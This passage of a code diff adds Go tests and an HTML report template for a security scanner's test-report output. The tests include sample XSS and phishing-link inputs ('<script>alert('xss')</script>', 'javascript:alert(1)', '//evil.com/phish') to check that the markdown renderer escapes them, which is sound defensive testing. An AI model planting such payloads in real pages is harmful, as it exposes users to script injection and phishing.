+	}
+
+	// Issue titles
+	assert.Contains(t, output, "Directory Traversal")
+	assert.Contains(t, output, "Open Redirect")
+	assert.Contains(t, output, "Arbitrary Code Injection")
+	assert.Contains(t, output, "Denial of Service (DoS)")
+
+	// Severity badges
+	assert.Contains(t, output, "#CE5019", "expected HIGH severity color")
+	assert.Contains(t, output, "#D68000", "expected MEDIUM severity color")
+	assert.Contains(t, output, "#88879E", "expected LOW severity color")
+	assert.Contains(t, output, "HIGH")
+	assert.Contains(t, output, "MEDIUM")
+	assert.Contains(t, output, "LOW")
+
+	// Component names
+	assert.Contains(t, output, "brace-expansion")
+	assert.Contains(t, output, "async")
+	assert.Contains(t, output, "cookie")
+	assert.Contains(t, output, "lodash")
+
+	// Issue card count: 9 unique issues expected
+	cardCount := strings.Count(output, "issue-card")
+	assert.GreaterOrEqual(t, cardCount, 9, "expected at least 9 issue cards (open issues)")
+
+	// Markdown is rendered as HTML, not plaintext
+	assert.Contains(t, output, "<h2>Overview</h2>", "expected markdown headings rendered as HTML")
+	assert.Contains(t, output, "<h2>Remediation</h2>", "expected Remediation heading rendered")
+
+	// CWE identifiers
+	assert.Contains(t, output, "CWE-601", "expected CWE identifier on card")
+
+	// Reachability indicator
+	assert.Contains(t, output, "No Path Found", "expected reachability indicator for no_info")
+
+	// Vulnerability link
+	assert.Contains(t, output, `href="https://snyk.io/vuln/SNYK-JS-BRACEEXPANSION-9789073"`, "expected snyk.io vuln link")
+	assert.Contains(t, output, "More about this vulnerability", "expected vuln link text")
+}
+
+func assertSecretsHTMLContent(t *testing.T, output string) {
+	t.Helper()
+
+	assert.Contains(t, output, "Snyk Test Report")
+
+	// Secret finding titles
+	assert.Contains(t, output, "Generic API Key")
+	assert.Contains(t, output, "Generic Secret")
+
+	// Source locations (secrets have file paths, not dependency paths)
+	assert.Contains(t, output, "config.env")
+	assert.Contains(t, output, "aws_keys.txt")
+}
+
+func assertMultiProjectHTMLContent(t *testing.T, output string) {
+	t.Helper()
+
+	assert.Contains(t, output, "Snyk Test Report")
+
+	// Multiple result sections for 7 test results
+	sectionCount := strings.Count(output, "result-section")
+	assert.Equal(t, 7, sectionCount, "expected 7 result sections for multi-project fixture")
+
+	// Target files from different sub-projects
+	assert.Contains(t, output, "ghost/package.json")
+	assert.Contains(t, output, "golang/go.mod")
+	assert.Contains(t, output, "maven/pom.xml")
+	assert.Contains(t, output, "python/requirements.txt")
+}
+
+func assertWebgoatIgnoredHTMLContent(t *testing.T, output string) {
+	t.Helper()
+
+	assert.Contains(t, output, "Snyk Test Report")
+
+	// Meta description includes both open and ignored counts
+	assert.Contains(t, output, `open issues, `, "expected open count in meta description")
+	assert.Contains(t, output, ` ignored.`, "expected ignored count in meta description")
+
+	// Open issues should still be present
+	assert.Contains(t, output, "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1040458")
+	assert.Contains(t, output, "Deserialization of Untrusted Data")
+
+	// Ignored sections should be rendered as sibling details blocks
+	assert.Contains(t, output, "Ignored Security Issues", "expected ignored security issues header")
+	assert.Contains(t, output, "Ignored License Issues", "expected ignored license issues header")
+
+	// Ignored issue IDs must appear
+	ignoredIDs := []string{
+		"SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088330",
+		"SNYK-JAVA-ORGAPACHETOMCATEMBED-13723930",
+		"SNYK-JAVA-ORGBITBUCKETBC-6139942",
+		"SNYK-JAVA-ORGJRUBY-10557729",
+		"snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1",
+	}
+	for _, id := range ignoredIDs {
+		assert.Contains(t, output, id, "expected ignored issue ID %s in HTML output", id)
+	}
+
+	// Ignored badge (rendered as HTML elements, not CSS class definitions)
+	ignoredBadgeCount := strings.Count(output, `<span class="ignored-badge">`)
+	assert.Equal(t, 5, ignoredBadgeCount, "expected 5 ignored badges (4 security + 1 license)")
+
+	// Ignore details metadata
+	assert.Contains(t, output, `<div class="ignore-details">`, "expected ignore details section")
+	assert.Contains(t, output, "Does not apply", "expected ignore justification")
+	assert.Contains(t, output, "False positive", "expected ignore justification")
+	assert.Contains(t, output, "Is not used", "expected ignore justification")
+	assert.Contains(t, output, "None Given", "expected ignore justification")
+	assert.Contains(t, output, "License issue", "expected ignore justification")
+
+	// Ignore reason types (categories)
+	assert.Contains(t, output, "wont-fix", "expected ignore reason type")
+	assert.Contains(t, output, "not-vulnerable", "expected ignore reason type")
+
+	// Ignored by
+	assert.Contains(t, output, "Catalin", "expected ignored-by user name")
+
+	// Expiration dates
+	assert.Contains(t, output, "November 10, 2026", "expected ignore expiration date")
+	assert.Contains(t, output, "December 12, 2026", "expected ignore expiration date")
+	assert.Contains(t, output, "Does not expire", "expected never-expire text")
+
+	// Ignored on dates
+	assert.Contains(t, output, "November 19, 2025", "expected ignored-on date")
+	assert.Contains(t, output, "November 11, 2025", "expected ignored-on date")
+
+	// Summary should show ignored count with severity badges in project summary
+	assert.Contains(t, output, `<span class="summary-label ignored-label">Ignored issues: `, "expected ignored summary row")
+	assert.Contains(t, output, `project-summary`, "expected unified project summary")
+
+	// Issue cards with ignored class
+	ignoredCardCount := strings.Count(output, `issue-card severity--`)
+	assert.GreaterOrEqual(t, ignoredCardCount, 5, "expected at least 5 ignored issue cards plus open cards")
+
+	// License issues use distinct link text
+	assert.Contains(t, output, "More about this license issue", "expected license-specific link text")
+	assert.Contains(t, output, "More about this vulnerability", "expected vulnerability link text for SCA issues")
+}
+
+func assertWebgoatNoIgnoresHTMLContent(t *testing.T, output string) {
+	t.Helper()
+
+	assert.Contains(t, output, "Snyk Test Report")
+
+	// Open issues should be present
+	assert.Contains(t, output, "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1040458")
+
+	// Ignored sections should NOT be rendered as HTML elements (CSS class defs in <style> are OK)
+	assert.NotContains(t, output, "Ignored Security Issues", "ignored security section should not render without include-ignores")
+	assert.NotContains(t, output, "Ignored License Issues", "ignored license section should not render without include-ignores")
+	assert.NotContains(t, output, `<span class="ignored-badge">`, "ignored badge element should not render without include-ignores")
+	assert.NotContains(t, output, `<div class="ignore-details">`, "ignore details element should not render without include-ignores")
+	assert.NotContains(t, output, `<span class="summary-label ignored-label">`, "ignored summary label should not render without include-ignores")
+
+	// Ignored issue IDs should NOT appear as card content (they are suppressed)
+	assert.NotContains(t, output, "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088330",
+		"suppressed issue should not appear without include-ignores")
+}
+
+func Test_HTMLTemplateFunctions(t *testing.T) {
+	t.Run("severityColor", func(t *testing.T) {
+		tests := []struct {
+			input    string
+			expected string
+		}{
+			{"critical", "#AB1A1A"},
+			{"CRITICAL", "#AB1A1A"},
+			{"high", "#CE5019"},
+			{"HIGH", "#CE5019"},
+			{"medium", "#D68000"},
+			{"low", "#88879E"},
+			{"unknown", "#88879E"},
+			{"", "#88879E"},
+		}
+		for _, tc := range tests {
+			t.Run(tc.input, func(t *testing.T) {
+				assert.Equal(t, tc.expected, presenters.SeverityColor(tc.input))
+			})
+		}
+	})
+
+	t.Run("truncateText", func(t *testing.T) {
+		tests := []struct {
+			input    string
+			maxLen   int
+			expected string
+		}{
+			{"short", 10, "short"},
+			{"exactly10!", 10, "exactly10!"},
+			{"this is a longer string", 10, "this is a ..."},
+			{"", 10, ""},
+		}
+		for _, tc := range tests {
+			t.Run(tc.input, func(t *testing.T) {
+				assert.Equal(t, tc.expected, presenters.TruncateText(tc.input, tc.maxLen))
+			})
+		}
+	})
+
+	t.Run("markdownToHTML", func(t *testing.T) {
+		tests := []struct {
+			name     string
+			input    string
+			contains []string
+		}{
+			{
+				name:     "heading",
+				input:    "## Overview\nSome text.",
+				contains: []string{"<h2>Overview</h2>", "<p>Some text.</p>"},
+			},
+			{
+				name:     "fenced code block",
+				input:    "Text\n```js\nconst x = 1;\n```\nMore text.",
+				contains: []string{"<pre><code>", "const x = 1;", "</code></pre>", "<p>More text.</p>"},
+			},
+			{
+				name:     "inline code",
+				input:    "Upgrade `got` to version 11.8.5.",
+				contains: []string{"<code>got</code>"},
+			},
+			{
+				name:     "bold",
+				input:    "This is **important** text.",
+				contains: []string{"<strong>important</strong>"},
+			},
+			{
+				name:     "link",
+				input:    "[GitHub](https://github.com)",
+				contains: []string{`<a href="https://github.com"`, `target="_blank"`, ">GitHub</a>"},
+			},
+			{
+				name:     "unordered list",
+				input:    "- Item one\n- Item two",
+				contains: []string{"<ul>", "<li>Item one</li>", "<li>Item two</li>", "</ul>"},
+			},
+			{
+				name:     "ordered list",
+				input:    "1. First\n2. Second\n3. Third",
+				contains: []string{"<ol>", "<li>First</li>", "<li>Second</li>", "<li>Third</li>", "</ol>"},
+			},
+			{
+				name:     "table",
+				input:    "| Name | Value |\n|---|---|\n| foo | bar |\n| baz | qux |",
+				contains: []string{"<table>", "<thead>", "<th>Name</th>", "<th>Value</th>", "</thead>", "<tbody>", "<td>foo</td>", "<td>bar</td>", "<td>baz</td>", "<td>qux</td>", "</tbody>", "</table>"},
+			},
+			{
+				name:     "table without separator",
+				input:    "| A | B |\n| 1 | 2 |",
+				contains: []string{"<table>", "<th>A</th>", "<td>1</td>"},
+			},
+			{
+				name:     "horizontal rule",
+				input:    "Before\n---\nAfter",
+				contains: []string{"<hr>"},
+			},
+			{
+				name:     "XSS prevention",
+				input:    "<script>alert('xss')</script>",
+				contains: []string{"&lt;script&gt;"},
+			},
+			{
+				name:     "link with angle brackets",
+				input:    "[click](javascript:alert(1))",
+				contains: []string{"javascript:alert(1)"},
+			},
+			{
+				name:     "protocol-relative URL blocked",
+				input:    "[click](//evil.com/phish)",
+				contains: []string{"click (//evil.com/phish)"},
+			},
+			{
+				name:     "URL with balanced parentheses",
+				input:    "[info](https://en.wikipedia.org/wiki/SQL_(topic))",
+				contains: []string{`href="https://en.wikipedia.org/wiki/SQL_(topic)"`},
+			},
+			{
+				name:     "bold in link text not in href",
+				input:    "[**bold text**](https://example.com)",
+				contains: []string{`href="https://example.com"`, "<strong>bold text</strong>"},
+			},
+		}
+		for _, tc := range tests {
+			t.Run(tc.name, func(t *testing.T) {
+				result := string(presenters.MarkdownToHTML(tc.input))
+				for _, expected := range tc.contains {
+					assert.Contains(t, result, expected)
+				}
+			})
+		}
+
+		t.Run("XSS_no_raw_script_tag", func(t *testing.T) {
+			result := string(presenters.MarkdownToHTML("<script>alert('xss')</script>"))
+			assert.NotContains(t, result, "<script>")
+		})
+	})
 }
 
 func Test_UfmPresenter_RegisterMimeType(t *testing.T) {

--- a/internal/presenters/templates/ufm.html.tmpl
+++ b/internal/presenters/templates/ufm.html.tmpl
@@ -1,3 +1,484 @@
-{{define "main"}}<!doctype html>
-{{helloworld}}
-{{end}}
+{{- define "htmlStyle" -}}
+<style>
+*{box-sizing:border-box;margin:0;padding:0}
+html{scrollbar-gutter:stable}
+body{font-family:-apple-system,BlinkMacSystemFont,avenir next,avenir,segoe ui,helvetica neue,helvetica,Ubuntu,roboto,noto,arial,sans-serif;background:#F5F5F5;color:#393842;line-height:1.5;font-size:100%}
+h1,h2,h3,h4,h5,h6{font-weight:500}
+a,a:link,a:visited{color:#4b45a9;text-decoration:none;border-bottom:1px solid #4b45a9}
+a:hover,a:focus,a:active{opacity:.8}
+a[href^="http://"]:after,a[href^="https://"]:after{background-image:linear-gradient(transparent,transparent),url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20112%20109%22%3E%3Cg%20fill%3D%22none%22%20fill-rule%3D%22evenodd%22%3E%3Cg%3E%3Cg%3E%3Cpath%20stroke%3D%22%234B45A9%22%20stroke-width%3D%2215%22%20d%3D%22M88.5%2021l-43%2042.5%22%20stroke-linecap%3D%22square%22%2F%3E%3Cpath%20fill%3D%22%234B45A9%22%20d%3D%22M111.2%200v50L61%200z%22%2F%3E%3C%2Fg%3E%3Cpath%20fill%3D%22%234B45A9%22%20d%3D%22M66%2015H0v94h94V44L79%2059v35H15V30h36z%22%2F%3E%3C%2Fg%3E%3C%2Fg%3E%3C%2Fsvg%3E");background-repeat:no-repeat;background-size:.75rem;content:"";display:inline-block;height:.75rem;margin-left:.25rem;width:.75rem}
+hr{border:none;margin:1em 0;border-top:1px solid #d3d3d9}
+code{background-color:#EEE;color:#333;padding:0.25em 0.5em;border-radius:0.25em}
+pre{font-size:14px}
+pre code{padding:10px;font-family:monospace;background-color:#393842;border-radius:4px;color:#fff;display:block;white-space:pre-wrap;overflow-x:auto}
+a code{border-radius:.125rem .125rem 0 0;padding-bottom:0;color:#4b45a9}
+.brand,.brand:link,.brand:visited{display:inline-block;border:none}
+.brand::after{background:none !important;width:0 !important;height:0 !important;content:none !important}
+.report-header{background:#030328;color:#fff;padding:20px 0}
+.report-header .header-inner{max-width:71.25rem;margin:0 auto;padding:0 20px}
+.report-header .header-top{display:flex;justify-content:space-between;align-items:flex-start}
+.report-header .brand svg{display:block}
+.report-header .brand:hover{opacity:.8}
+.report-header h1{font-size:24px;font-weight:500;margin:16px 0 12px}
+.report-header .test-meta{text-align:right;font-size:12px;opacity:.75;max-width:500px}
+.report-header .test-meta .timestamp{margin:0 0 6px}
+.report-header .meta-counts{display:flex;flex-wrap:wrap;gap:4px 0}
+.report-header .meta-count{display:inline-block;margin:0 12px 6px 0;padding-right:12px;border-right:2px solid rgba(255,255,255,.3);font-size:14px}
+.report-header .meta-count:last-child{border-right:none;padding-right:0}
+.container{max-width:71.25rem;margin:0 auto;padding:20px}.container + .container{padding-top:8px;margin-top:20px;border-top:1px solid #e8e8ec}
+.project-summary{background:#fff;border:1px solid #d3d3d9;border-left:5px solid #4B45A9;border-radius:0 4px 4px 0;margin-bottom:24px;overflow:hidden;box-shadow:0 1px 3px rgba(0,0,0,.08)}
+.project-summary .summary-meta{padding:14px 20px;display:grid;grid-template-columns:auto 1fr;gap:4px 12px;font-size:14px;color:#393842}
+.project-summary .meta-label{color:#727184;white-space:nowrap}
+.project-summary .meta-value{color:#393842;word-break:break-word}
+.project-summary .summary-counts{padding:14px 20px;border-top:1px solid #e8e8ec;display:grid;grid-template-columns:auto repeat(4,auto);gap:8px 6px;align-items:center}
+.project-summary .summary-counts .summary-label{font-weight:700;font-size:14px;white-space:nowrap;color:#393842}
+.project-summary .summary-counts .summary-label.ignored-label{color:#727184}
+.severity-badge{padding:4px 10px;border-radius:3px;font-size:12px;font-weight:700;color:#fff;display:inline-block;text-align:center;min-width:70px}
+.severity-badge--zero{background:transparent !important;border:1px solid #d3d3d9;color:#a0a0a0}
+.severity-badge--ignored{opacity:.55}
+.finding-type-section{margin-bottom:32px}
+.finding-type-section[open]{border-bottom:2px solid #e0e0e0}
+.finding-type-section summary{cursor:pointer;list-style:none;padding-bottom:8px}
+.finding-type-section summary::-webkit-details-marker{display:none}
+.finding-type-header{font-size:18px;font-weight:600;margin:0;color:#333;display:flex;align-items:center}
+.finding-type-header .chevron{width:1em;height:1em;margin-right:6px;flex-shrink:0;transition:transform .15s ease}
+.finding-type-header .chevron path{fill:#586069}
+.finding-type-section[open] .finding-type-header .chevron{transform:rotate(90deg)}
+.issue-card{background:#fff;border:1px solid #d3d3d9;border-radius:4px;border-top-width:4px;margin-bottom:20px;position:relative;overflow:hidden}
+.issue-card.severity--critical{border-top-color:#AB1A1A}
+.issue-card.severity--high{border-top-color:#CE5019}
+.issue-card.severity--medium{border-top-color:#D68000}
+.issue-card.severity--low{border-top-color:#88879E}
+.issue-card .card-header{padding:24px}
+.issue-card .card-header-main{display:flex;align-items:flex-start}
+.issue-card .severity-icon{flex-shrink:0;width:32px;height:32px;border-radius:4px;margin-right:12px;display:flex;align-items:center;justify-content:center;color:#fff;font-size:14px;font-weight:700}
+.issue-card h3{display:inline;font-size:22px;font-weight:600;color:#393842;vertical-align:top;margin:0}
+.issue-card .card-meta{display:flex;flex-wrap:wrap;align-items:flex-start;margin:10px 0 0;padding:0;list-style:none}
+.issue-card .card-meta-item{display:inline-block;padding-right:8px;border-right:1px solid #eee;margin-right:8px;font-size:12px;color:#727184}
+.issue-card .card-meta-item:last-child{border-right:none;padding-right:0;margin-right:0}
+.issue-card .risk-score{position:absolute;top:24px;right:24px;text-align:right}
+.issue-card .risk-score__label{font-size:11px;font-weight:700;color:#586069;text-transform:uppercase;line-height:1;margin-bottom:3px}
+.issue-card .risk-score__value{font-size:30px;font-weight:600;color:#24292e;line-height:1}
+.issue-card .card-section{padding:24px;border-top:1px solid #d3d3d9;background-color:#faf9fa}
+.issue-card .card-detail{font-size:14px;color:#586069;margin-bottom:8px}
+.issue-card .card-detail .detail-label{font-weight:600;color:#393842}
+.dep-path{margin:2px 0 2px 16px;font-size:13px}
+.dep-paths-toggle{margin:4px 0 0 0;font-size:13px}
+.dep-paths-toggle summary{cursor:pointer;color:#4b45a9;font-size:12px;margin:2px 0 2px 16px;list-style:none}
+.dep-paths-toggle summary::-webkit-details-marker{display:none}
+.dep-paths-toggle summary::before{content:"▸ "}
+.dep-paths-toggle[open] summary::before{content:"▾ "}
+.dep-paths-toggle .toggle-less{display:none}
+.dep-paths-toggle[open] .toggle-more{display:none}
+.dep-paths-toggle[open] .toggle-less{display:inline}
+.issue-card .vuln-link{margin-top:16px;font-size:13px}
+.issue-description{font-size:14px;color:#393842;margin-top:16px;line-height:1.6}
+.issue-description h2{font-size:18px;font-weight:600;margin:16px 0 8px;color:#393842}
+.issue-description h3{font-size:16px;font-weight:600;margin:14px 0 6px;color:#393842}
+.issue-description p{margin:0 0 12px}
+.issue-description ul,.issue-description ol{margin:6px 0 12px 20px}
+.issue-description li{margin:2px 0}
+.issue-description code{background:#eee;color:#333;padding:1px 4px;border-radius:3px;font-size:13px}
+.issue-description pre{margin:8px 0}
+.issue-description pre code{font-size:13px}
+.issue-description hr{border:none;border-top:1px solid #e0e0e0;margin:12px 0}
+.issue-description table{border-collapse:collapse;margin:8px 0;width:100%;border:1px solid #d3d3d9;border-radius:3px}
+.issue-description th,.issue-description td{border:1px solid #d3d3d9;padding:6px 10px;text-align:left;font-size:13px}
+.issue-description th{background:#f5f5f5;font-weight:600}
+.issue-description td{background:#fff}
+.issue-description a{color:#4b45a9}
+.issue-summary{position:relative;padding:16px 24px;border:1px solid #d3d3d9;border-left-width:4px;border-radius:2px;background-color:#fff;color:#393842;word-break:break-word;margin-top:16px}
+.issue-summary.severity--critical{border-left-color:#AB1A1A}
+.issue-summary.severity--high{border-left-color:#CE5019}
+.issue-summary.severity--medium{border-left-color:#D68000}
+.issue-summary.severity--low{border-left-color:#88879E}
+.issue-summary .issue-description{margin-top:0}
+.issue-summary .file-location{margin-top:10px;font-size:13px;color:#727184}
+.issue-summary .file-location + .file-location{margin-top:4px}
+.card-section > .issue-summary:first-child{margin-top:0}
+.issue-summary .issue-description h2{font-size:15px;margin:12px 0 6px}
+.issue-summary .issue-description h3{font-size:14px;margin:10px 0 4px}
+.issue-summary a[href^="http://"]:after,.issue-summary a[href^="https://"]:after{display:none}
+.no-issues{font-size:15px;color:#586069;padding:12px 0}
+.issue-card.ignored{opacity:.75}
+.issue-card.ignored .card-header{background:#faf9fa}
+.ignored-badge{display:inline-block;background:#727184;color:#fff;font-size:11px;font-weight:700;padding:2px 8px;border-radius:3px;margin-left:10px;vertical-align:middle;text-transform:uppercase;letter-spacing:.5px}
+.ignore-details{background:#f0eff4;padding:16px 24px;border-top:1px solid #d3d3d9;font-size:13px;color:#586069}
+.ignore-details .ignore-detail{margin-bottom:4px}
+.ignore-details .ignore-label{font-weight:600;color:#393842;display:inline-block;min-width:100px}
+.ignored-section{margin-top:20px;padding-top:14px;border-top:1px solid #e8e8ec}
+.ignored-section-header{font-size:16px;font-weight:600;margin:0 0 12px;color:#727184}
+.dataflow{margin:16px 0 0;border-top:1px solid #e0e0e0;padding-top:12px}
+.dataflow__heading{font-size:15px;font-weight:600;color:#393842;margin:0 0 8px;display:flex;align-items:center}
+.dataflow__heading .heading-char{margin-right:6px;font-size:18px}
+.dataflow__filename{padding:6px 12px;border:1px solid #eee;border-radius:4px;margin:12px 0 6px;font-size:13px;color:#393842;background-color:#fff}
+.dataflow__item{display:flex;align-items:center;padding:4px 8px;font-family:monospace;color:#393842;font-size:14px;border:1px solid transparent;border-width:1px 0}
+.dataflow__item:hover{border-color:#eee;background-color:#fff}
+.dataflow__step{flex:0 0 30px;width:30px;text-align:right;color:#727184;font-size:12px}
+.dataflow__lineno{flex:0 0 60px;padding:0 12px 0 8px;text-align:right;color:#727184;font-size:12px}
+.dataflow__code{flex:1;font-family:monospace;font-size:13px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}
+.dataflow__code .marker{padding:2px 6px;border-radius:4px;background-color:rgba(0,0,0,.1);white-space:nowrap}
+.dataflow__item:hover .marker{background-color:#ffc905}
+.dataflow__badge{padding:2px 3px;border:1px solid #d3d3d9;border-radius:2px;margin-left:8px;background-color:#f4f4f6;font-size:11px;line-height:1;font-family:sans-serif;text-transform:uppercase;color:#646374}
+.card-tab-radio{display:none}
+.card-tab-bar{display:flex;padding:6px 24px;border-top:1px solid #d3d3d9;background:#f5f5f5;gap:4px}
+.card-tab-label{padding:5px 15px;font-size:14px;cursor:pointer;border-radius:20px;border:1px solid #d3d3d9;background:#fff;transition:all .2s}
+.card-tab-label:hover{color:#4b45a1}
+.issue-card .card-tab-radio[id^="tab-df"]:checked ~ .card-section .dataflow{display:block}
+.issue-card .card-tab-radio[id^="tab-df"]:checked ~ .card-section .fix-analysis{display:none}
+.issue-card .card-tab-radio[id^="tab-df"]:checked ~ .card-tab-bar label[for^="tab-df"]{background:#4b45a1;color:#fff;border-color:#4b45a1}
+.issue-card .card-tab-radio[id^="tab-fa"]:checked ~ .card-section .fix-analysis{display:block}
+.issue-card .card-tab-radio[id^="tab-fa"]:checked ~ .card-section .dataflow{display:none}
+.issue-card .card-tab-radio[id^="tab-fa"]:checked ~ .card-tab-bar label[for^="tab-fa"]{background:#4b45a1;color:#fff;border-color:#4b45a1}
+.fix-analysis{margin:16px 0 0;border-top:1px solid #e0e0e0;padding-top:12px}
+.card-tab-bar ~ .card-section .dataflow{border-top:none;padding-top:0}
+.card-tab-bar ~ .card-section .fix-analysis{border-top:none;padding-top:0}
+.dataflow__filename:first-child{margin-top:0}
+.fix-analysis__heading{font-size:15px;font-weight:600;color:#393842;margin:0 0 8px;display:flex;align-items:center}
+.fix-analysis__heading .heading-char{margin-right:6px;font-size:18px;color:#2a7b3f}
+@media print{.report-header,.card-tab-bar{display:none}.fix-analysis,.dataflow{display:block !important}.issue-card .card-section{background:none}.marker{border:1px solid #555;background:transparent}.project-summary{border-left-color:#000;border-left-width:3px;box-shadow:none}.project-summary .severity-badge{border:1px solid #999;color:#000;background:transparent !important}}
+</style>
+{{- end -}}
+
+{{- define "htmlHeader" -}}
+<header class="report-header">
+  <div class="header-inner">
+    <div class="header-top">
+      <a class="brand" href="https://snyk.io" title="Snyk - Open Source Security" target="_blank" rel="noopener noreferrer">
+        <svg width="68" height="35" viewBox="0 0 68 35" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Snyk logo">
+          <g fill="#fff" fill-rule="evenodd">
+            <path d="M5.732,27.278 C3.445,27.278 1.589,26.885 0,26.124 L0.483,22.472 C2.163,23.296 4.056,23.689 5.643,23.689 C6.801,23.689 7.563,23.295 7.563,22.599 C7.563,20.594 0.333,21.076 0.333,15.839 C0.333,12.491 3.407,10.729 7.259,10.729 C9.179,10.729 11.161,11.249 12.444,11.704 L11.924,15.294 C10.577,14.774 8.747,14.291 7.222,14.291 C6.282,14.291 5.518,14.621 5.518,15.231 C5.518,17.208 12.903,16.815 12.903,21.925 C12.903,25.325 9.877,27.277 5.733,27.277 L5.732,27.278 Z M25.726,26.936 L25.726,17.894 C25.726,15.827 24.811,14.85 23.069,14.85 C22.219,14.85 21.329,15.09 20.719,15.46 L20.719,26.936 L15.352,26.936 L15.352,11.262 L20.602,10.83 L20.474,13.392 L20.652,13.392 C21.784,11.87 23.702,10.716 25.992,10.716 C28.736,10.716 31.112,12.416 31.112,16.436 L31.112,26.936 L25.724,26.936 L25.726,26.936 Z M61.175,26.936 L56.879,19.479 L56.446,19.479 L56.446,26.935 L51.082,26.935 L51.082,8.37 L56.447,0 L56.447,17.323 C57.515,16.017 61.112,11.059 61.112,11.059 L67.732,11.059 L61.454,17.689 L67.949,26.95 L61.175,26.95 L61.175,26.938 L61.175,26.936 Z M44.13,11.11 L41.93,18.262 C41.5,19.606 41.08,22.079 41.08,22.079 C41.08,22.079 40.75,19.516 40.292,18.172 L37.94,11.108 L31.928,11.108 L38.462,26.935 C37.572,29.04 36.199,30.815 34.369,30.815 C34.039,30.815 33.709,30.802 33.389,30.765 L31.255,34.061 C31.928,34.441 33.212,34.835 34.737,34.835 C38.703,34.835 41.359,31.627 43.215,26.885 L49.443,11.108 L44.132,11.108 L44.13,11.11 Z"/>
+          </g>
+        </svg>
+      </a>
+      <div class="test-meta">
+        {{- if .TestResults }}<p class="timestamp">{{ reportTimestamp .TestResults }}</p>{{ end -}}
+      </div>
+    </div>
+    <h1>Snyk Test Report</h1>
+  </div>
+</header>
+{{- end -}}
+
+{{- define "htmlProjectSummary" -}}
+{{- $metadata := .Get "metadata" -}}
+{{- $issues := getIssuesFromTestResult . -}}
+{{- $summaries := getSummariesFromIssues $issues -}}
+{{- $effectiveSummary := index $summaries "effective" -}}
+{{- $ignoredSummary := index $summaries "ignored" -}}
+{{- $effectiveSeverities := index $effectiveSummary.CountBy "severity" -}}
+{{- $ignoredSeverities := index $ignoredSummary.CountBy "severity" -}}
+{{- $targetDir := "" -}}
+{{- if $metadata }}{{ $targetDir = index $metadata "target-directory" }}{{ end -}}
+{{- if not $targetDir }}{{ $targetDir = getValueFromConfig "targetDirectory" }}{{ end -}}
+{{- $projectName := "" -}}
+{{- if $metadata }}{{ $projectName = index $metadata "project-name" }}{{ end -}}
+{{- $targetFile := "" -}}
+{{- if $metadata }}{{ $targetFile = index $metadata "display-target-file" }}{{ end -}}
+{{- $depCount := "" -}}
+{{- if $metadata }}{{ $depCount = index $metadata "dependency-count" }}{{ end -}}
+{{- $coverage := getCoverageFromTestResult . -}}
+{{- $orgSlug := getValueFromConfig "internal_org_slug" -}}
+{{- $findingTypes := getFindingTypesFromTestResult . -}}
+{{- $testType := determineProductNameFromFindingTypes $findingTypes -}}
+<div class="project-summary">
+  {{- if or $orgSlug $testType $targetDir $projectName $targetFile $depCount $coverage }}
+  <div class="summary-meta">
+    {{- if $orgSlug }}
+    <span class="meta-label">Organization</span><span class="meta-value">{{ $orgSlug }}</span>
+    {{- end }}
+    {{- if $testType }}
+    <span class="meta-label">Test type</span><span class="meta-value">{{ $testType }}</span>
+    {{- end }}
+    {{- if $targetDir }}
+    <span class="meta-label">Project path</span><span class="meta-value">{{ $targetDir }}</span>
+    {{- end }}
+    {{- if $projectName }}
+    <span class="meta-label">Project</span><span class="meta-value">{{ $projectName }}</span>
+    {{- end }}
+    {{- if $targetFile }}
+    <span class="meta-label">Target file</span><span class="meta-value">{{ $targetFile }}{{- if $depCount }} ({{ int $depCount }} dependencies){{- end }}</span>
+    {{- end }}
+    {{- if $coverage }}
+    <span class="meta-label">Scan coverage</span>
+    <span class="meta-value">
+      {{- range $i, $cov := $coverage }}
+      {{- if $cov.IsSupported }}{{- if $i }}, {{ end }}{{ $cov.Lang }}: {{ $cov.Files }} files{{- end }}
+      {{- end }}
+    </span>
+    {{- end }}
+  </div>
+  {{- end }}
+  <div class="summary-counts">
+    <span class="summary-label">Open issues: {{ $effectiveSummary.Count }}</span>
+    {{- range $severity := getSeverities | reverse }}
+    {{- $count := index $effectiveSeverities $severity }}
+    <span class="severity-badge{{- if eq $count 0 }} severity-badge--zero{{- end }}"{{- if gt $count 0 }} style="background:{{ severityColor $severity }}"{{- end }}>{{ $count }} {{ toUpperCase $severity }}</span>
+    {{- end }}
+    {{- if and (eq (getValueFromConfig "include-ignores") "true") (gt $ignoredSummary.Count 0) }}
+    <span class="summary-label ignored-label">Ignored issues: {{ $ignoredSummary.Count }}</span>
+    {{- range $severity := getSeverities | reverse }}
+    {{- $count := index $ignoredSeverities $severity }}
+    <span class="severity-badge{{- if eq $count 0 }} severity-badge--zero{{- else }} severity-badge--ignored{{- end }}"{{- if gt $count 0 }} style="background:{{ severityColor $severity }}"{{- end }}>{{ $count }} {{ toUpperCase $severity }}</span>
+    {{- end }}
+    {{- end }}
+  </div>
+</div>
+{{- end -}}
+
+{{- define "htmlCardBody" -}}
+{{- $issue := .Issue -}}
+{{- $testResult := .TestResult -}}
+{{- $severity := $issue.GetEffectiveSeverity -}}
+{{- $findingType := $issue.GetFindingType -}}
+{{- $issueID := $issue.GetID -}}
+{{- $flows := getExecutionFlowsFromIssue $issue -}}
+{{- $rule := getSnykCodeRuleFromIssue $issue -}}
+{{- $hasDataFlow := false -}}
+{{- if $flows }}{{- range $flow := $flows }}{{- if $flow.Flow }}{{- $hasDataFlow = true }}{{- end }}{{- end }}{{- end -}}
+{{- $hasFixAnalysis := false -}}
+{{- if $rule }}{{- if $rule.Help.Markdown }}{{- $hasFixAnalysis = true }}{{- end }}{{- end -}}
+{{- $hasTabs := and $hasDataFlow $hasFixAnalysis -}}
+  {{- if $hasTabs }}
+  <input type="radio" name="tab-{{ $issueID }}" id="tab-df-{{ $issueID }}" class="card-tab-radio" checked>
+  <input type="radio" name="tab-{{ $issueID }}" id="tab-fa-{{ $issueID }}" class="card-tab-radio">
+  {{- end }}
+  {{- $riskScore := $issue.GetRiskScore }}
+  {{- if $riskScore }}
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">{{ $riskScore }}</div></div>
+  {{- end }}
+  <div class="card-header">
